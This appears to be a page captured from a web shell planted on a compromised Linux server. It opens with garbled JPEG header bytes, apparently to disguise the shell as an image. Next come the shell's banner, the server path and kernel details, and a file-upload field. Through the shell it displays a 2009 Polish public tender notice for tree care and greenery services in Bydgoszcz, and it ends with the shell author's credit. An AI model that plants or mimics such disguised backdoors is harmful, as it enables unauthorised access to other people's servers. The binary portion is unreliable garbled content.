JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090108/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090108/8691-N-2009.html

<p class="kh_header"><b>Bydgoszcz: 79/P/2008 -1</b><br>
<b>Numer ogłoszenia: 8691 - 2009; data zamieszczenia: 08.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Administracja Domów Miejskich "ADM" Spółka z o.o. , ul. Śniadeckich 1, 85-011 Bydgoszcz, woj. kujawsko-pomorskie, tel. 052 3481600, faks 052 3481607.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.adm.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> 79/P/2008 -1.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wybór usługodawcy w zakresie wykonywania cięć pielęgnacyjnych, wycinki drzew, pielęgnacji zieleni dla Administracji Domów Miejskich ADMSp. z o.o. w Bydgoszczy.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 77.00.00.00-0, 77.21.11.00-3, 77.21.14.00-6, 77.21.15.00-7, 77.21.16.00-8, 77.31.00.00-6, 90.72.20.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.01.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1  O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1  posiadają uprawnienia do wykonywania określonej działalności lub czynności,
   jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, a w 
   szczególności:
a   wykonawcy prowadzą działalność gospodarczą w zakresie odpowiadającym 
     przedmiotowi zamówienia
b   wykonawcy będący wytwórcami odpadów powstałych w wyniku prowadzenia    
    ich działalności gospodarczej winni posiadać decyzję zatwierdzającą program
   gospodarki odpadami lub mieć podpisana stosowna umowę z podmiotem, który
   taka decyzję posiada.
   W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są 
   przedłożyć następujący dokument: aktualny odpis z właściwego rejestru albo
   aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli 
   odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji 
   działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed
   upływem terminu składania ofert, oraz decyzję zatwierdzającą program
   gospodarki odpadami lub umowę z podmiotem posiadającym taka decyzje lub inny
   stosowny dokument
   w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez
   dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe 
   dokumenty dla każdego z nich,
2   posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem
    technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią 
    pisemne zobowiązanie innych podmiotów do udostępnienia potencjału
    technicznego i osób zdolnych do wykonywania zamówienia, a w szczególności
    Wykonawca
a   wykaże co najmniej 4 pracowników  w tym: 2 pilarzy z uprawnieniami, 1 osobę z 
     uprawnieniami do kierowania pojazdami mechanicznymi, oraz osobę pełniącą
     funkcję kierownicze posiadająca wykształcenie ogrodnicze, rolnicze lub
      leśnicze, 
b    wykaże co najmniej 1 zamówienie wykonane przez siebie w ciągu ostatnich
     trzech lat, odpowiadające swoim rodzajem i wartością usłudze stanowiącej 
     przedmiot zamówienia   usługa o wartości co najmniej 80 - 120 tys. zł
     brutto-rok w zakresie pielęgnacji zieleni lub wycinki drzew
c   wykaże jako zaplecze techniczne co najmniej: pilarki -  2szt. podkrzesywarki - 
     2 szt. podnośnik - 1 szt. glebogryzarka podczepiana - 1 szt.glebogryzarka 
    ręczna - 1 szt.pojazd mechaniczny - 1szt.
    W celu potwierdzenia spełniania niniejszego warunku Wykonawcy są zobowiązani 
    przedłożyć: 
-  prawidłowo wypełniony załącznik nr 4A, 5, 6  do SIWZ,
-  dokument potwierdzający, iż usługi zostały wykonane należycie np. referencje
      w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o 
      udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał
      techniczny i kadrowy oraz łączne kwalifikacje i doświadczenie
3     znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie
      zamówienia, a w szczególności:
a     jest ubezpieczony od odpowiedzialności cywilnej z tytułu prowadzonej 
      działalności gospodarczej na sumę ubezpieczenia nie mniejszą niż 100.000,00 zł  
      W celu potwierdzenia spełniania niniejszego warunku Wykonawca musi złożyć
      polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca
      jest ubezpieczony od odpowiedzialności cywilnej deliktowej w zakresie 
      prowadzonej działalności.	
      w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o 
      udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał 
      ekonomiczny
4    nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na 
     podstawie przepisów art. 24 ust. 1 i 2 Pzp.
     w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez
     dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe
     dokumenty dla każdego z nich:
5    złożyć oświadczenie, sporządzone według wzoru stanowiącego załącznik nr 3
     do SIWZ, o spełnianiu warunków udziału w postępowaniu. 
2   Ocena spełniania warunków udziału wykonawcy w postępowaniu zostanie
     dokonana: wg formuły - spełnia - nie spełnia,tj. na podstawie analizy
     załączonych do oferty dokumentów potwierdzających spełnianie warunków 
    wymienionych w pkt. 1.
3.  Niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem
    wykonawcy z postępowania. Ofertę wykonawcy wykluczonego uznaje się za
    odrzuconą..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełnienia warunków udziału w postępowaniu, o których 
     mowa w punkcie 5 Wykonawca ubiegający się o zamówienie publiczne jest 
     zobowiązany załączyć do oferty niżej wymienione dokumenty:
1   Oferta złożona wg formularza ofertowego. Treść oferty powinna odpowiadać
     merytorycznej zawartości  załącznika nr 1 do SIWZ, 
2    Podział ceny na składniki stanowiący załącznik nr 2 do SIWZ, oraz jednostkowe
     zestawienie cen - wg wzoru stanowiącego załącznik nr 2a do SIWZ
3   Oświadczenie określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych -  
     wg wzoru Zamawiającego stanowiącego załącznik nr 3 do SIWZ
4    wykazu osób, którymi dysponuje lub będzie dysponował wykonawca i które
      będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat 
      ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do
      wykonania zamówienia, a także zakresu wykonywanych przez nie czynności
      pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do 
      wykonania zamówienia, jeżeli w wykazie, o którym mowa wyżej, wykonawca
      wskazał osoby, którymi będzie dysponował:- wg wzoru Zamawiającego
      stanowiącego załączniki nr 4 A    
5    Oświadczenie dotyczące zakresu prac jakie Wykonawca zamierza powierzyć do
      wykonania podwykonawcy - załącznik nr 4 B do SIWZ 
6    Wykaz wykonanych w ciągu ostatnich trzech lat usług, a jeżeli okres
     prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim
     rodzajem i wartością usługom stanowiącym przedmiot zamówienia,  z podaniem
     ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów
     potwierdzających, że usługi te zostały wykonane należycie - wg wzoru
     Zamawiającego stanowiącego załącznik nr 5 do SIWZ 
7   Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakimi
     dysponuje Wykonawca wg załącznika nr 6 do SIWZ
8    Aktualny odpis z właściwego rejestru albo aktualne zaświadczenia o wpisie do
     ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do
     rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego 
     nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
9   polisa, a w przypadku jej braku inny dokument potwierdzający, że wykonawca
     jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej 
     działalności na kwotę min. 100.000 zł, 
10  Pełnomocnictwo wykonawców wspólnie ubiegających się o udzielenie
     zamówienia (należy przedstawić w okresie od złożenia oferty do momentu
     zawarcia umowy z Zamawiającym),
11   Pełnomocnictwo do reprezentowania Wykonawcy przez pełnomocnika,
12   decyzja na prowadzenie działalności w zakresie odzysku odpadów ulegających 
      biodegradacji ,biomasa, wraz z promesą dotyczącą uzgodnionego odbioru 
      odpadów lub umowa, lub inny stosowny dokument z podmiotem gospodarczym
      posiadającym zezwolenie na świadczenie podobnych usług dysponujący 
      przedmiotowym  dokumentem..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.adm.com.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ADMINISTRACJA DOMÓW MIEJSKICH
ADM SP. Z O.O.
UL. Gdańska 9 
Sekcja Zamówień Publicznych, ul. Gdańska 9 II p
85-005 BYDGOSZCZ.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.01.2009 godzina 10:00, miejsce: ADMINISTRACJA DOMÓW MIEJSKICH
ADM SP. Z O.O.
UL. Gdańska 9 
Sekcja Zamówień Publicznych, ul. Gdańska 9 II p
85-005 BYDGOSZCZ.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com